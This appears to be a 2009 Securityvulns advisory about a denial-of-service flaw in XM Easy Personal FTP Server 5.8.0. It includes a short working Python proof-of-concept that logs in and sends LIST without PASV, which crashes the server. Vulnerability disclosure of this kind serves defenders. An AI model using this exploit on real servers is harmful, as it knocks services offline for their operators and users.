XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2009-11-11T00:00:00


Date of Discovery: 10-Nov-2009


Vendor: Dxmsoft

Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected

Overview: XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when the "LIST" is sent to FTP server if you do not use "PASV" or "POST" first.

Details: XM Easy Personal FTP Server can't handle "LIST" command if you do not use "PASV" or "POST" first.If you have logged on the server successfully,a "LIST" command will lead the ftp server to crash.

Severity: High

Exploit example:


import socket import sys

def Usage(): print ("Usage: ./expl.py <serv_ip> <Username> <password>\n") print ("Example:./expl.py anonymous anonymous\n") if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) sock.send("user %s\r\n" %username) r=sock.recv(1024) sock.send("pass %s\r\n" %passwd) r=sock.recv(1024) sock.send("LIST\r\n") sock.close() sys.exit(0);